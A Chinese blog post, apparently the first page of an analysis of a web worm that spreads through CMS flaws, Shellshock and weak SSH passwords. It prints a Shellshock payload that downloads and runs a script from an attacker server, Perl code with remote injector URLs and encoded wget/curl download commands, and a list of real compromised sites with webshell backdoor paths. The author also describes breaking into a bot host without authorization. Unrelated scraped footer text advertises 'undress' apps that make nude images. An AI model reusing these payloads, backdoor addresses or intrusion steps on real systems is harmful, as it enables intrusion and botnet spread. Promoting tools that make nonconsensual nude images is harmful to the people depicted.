最近,一个很新颖而且强大的web蠕虫被捕获,它功能上相当于一个综合漏洞扫描器。该蠕虫主要利用一些web程序的高危漏洞进行传播,其中包括phpmyadmin,wordpress,joomla,magento等等知名网站app的漏洞,还有破壳漏洞,ssh弱口令,sql注入,自动提权。
感染后的bot会从服务端接收指令,进行ddos攻击,漏洞扫描感染其他主机,作为http proxy,生成irc服务端等等。分析发现已经感染的主机里作为web proxy的网站已达1000个,后续我会把涉及的所有源码分享(包括臭名昭著的phpmyadmin蠕虫zmeu)。
0×01 起因
翻看vps web日志时候看到了攻击迹象,有zmeu的useragent,有shellshock的payload。
然后顺藤摸瓜getshell了一个bot(通过wordpress的一个漏洞下载数据库配置文件,用数据库密码成功登录wordpress,但是没有安装插件权限,在修改文章的地方插入insertPHP插件解析的php代码,韩语的折腾了1个多小时)。
在网站目录里找到一个功能很强大的php大马,支持bypass safe mode,安装代理等等,所以决定深入挖掘。
在这个bot上下载的一些源码,发现了触目惊心的CC程序。
0×02 分析
这个蠕虫仅仅pl脚本部分代码已达上万行,所以分析不当的地方请指出。Bot节点一旦扫描出某个服务器存在漏洞,就在该漏洞主机上下载控制脚本并执行,这个主机就沦为一个bot,最后会给控制者发送一封邮件注册该被控主机。例如Shellshock的payload
"() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";
system(\"wget http://xxxserver.com/shell.txt -O /tmp/shell.txt;curl -O /tmp/shell.txt http:// xxxserver.com/shell.txt;
perl /tmp/shell.txt ; rm -rf shell.txt \");'"
我们从web漏洞感染做为主线分析一下流程。为了简明我会把一些代码省略掉。
初始化远程下载服务器地址:
my $rceinjector = "http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/error.php";
my $rceinjector2 = "http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/xml.php";
#my $arbitrary = "http://www.handelwpolsce.pl/images/Sport/rce.php";
#my $hostinjector = "wordpress.com.longlifeweld.com.my";
my $thumbid = "http://".$hostinjector."/petx.php";
my $thumbidx = "http://".$hostinjector."/cpx.php";
linux 下载指令,通过web参数传递的,bot成功利用漏洞getshell后,会把这些下载被控端脚本的指令发送给webshell。
my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;wget%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;wget%20http%3A%2F%2F".$hostinjector."%2Fmagic1.php";
my $lwpdon = "?cmd=lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fcpx.php";
my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fcpx.php";
初始化1000个web代理后门地址,为后边批量采集做准备
my @randombarner= ("http://www.lesyro.cz/administrator/components/com_media/helpers/errors.php",
"http://www.villaholidaycentre.co.uk/includes/js/calendar/lang/seka.php",
"http://viewwebinars.com/wp-includes/errors.php",
"http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php",
"http://www.linuxcompany.nl/modules/mod_login/error.php",
"http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php",
"http://liftoffconsulting.ca/wp-includes/errors.php",
"http://www.voileenligne.com/audio/komo.php",
"http://www.gingerteastudio.com//wp-content/uploads/components/search.php",
"www.audiovisionglobal.pe/online/includes/js/calendar/lang/search.php",
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] 下一页

Load balancing affects session management, but can be resolved with session replication, session stickiness, and centralized session storage. 1. Session Replication Copy session data between servers. 2. Session stickiness directs user requests to the same server. 3. Centralized session storage uses independent servers such as Redis to store session data to ensure data sharing.

Sessionlockingisatechniqueusedtoensureauser'ssessionremainsexclusivetooneuseratatime.Itiscrucialforpreventingdatacorruptionandsecuritybreachesinmulti-userapplications.Sessionlockingisimplementedusingserver-sidelockingmechanisms,suchasReentrantLockinJ

Alternatives to PHP sessions include Cookies, Token-based Authentication, Database-based Sessions, and Redis/Memcached. 1.Cookies manage sessions by storing data on the client, which is simple but low in security. 2.Token-based Authentication uses tokens to verify users, which is highly secure but requires additional logic. 3.Database-basedSessions stores data in the database, which has good scalability but may affect performance. 4. Redis/Memcached uses distributed cache to improve performance and scalability, but requires additional matching

Sessionhijacking refers to an attacker impersonating a user by obtaining the user's sessionID. Prevention methods include: 1) encrypting communication using HTTPS; 2) verifying the source of the sessionID; 3) using a secure sessionID generation algorithm; 4) regularly updating the sessionID.

The article discusses PHP, detailing its full form, main uses in web development, comparison with Python and Java, and its ease of learning for beginners.

PHP handles form data using $\_POST and $\_GET superglobals, with security ensured through validation, sanitization, and secure database interactions.

The article compares PHP and ASP.NET, focusing on their suitability for large-scale web applications, performance differences, and security features. Both are viable for large projects, but PHP is open-source and platform-independent, while ASP.NET,

PHP's case sensitivity varies: functions are insensitive, while variables and classes are sensitive. Best practices include consistent naming and using case-insensitive functions for comparisons.


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Hot Tools

Zend Studio 13.0.1
Powerful PHP integrated development environment

WebStorm Mac version
Useful JavaScript development tools

SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.

Safe Exam Browser
Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.

mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),
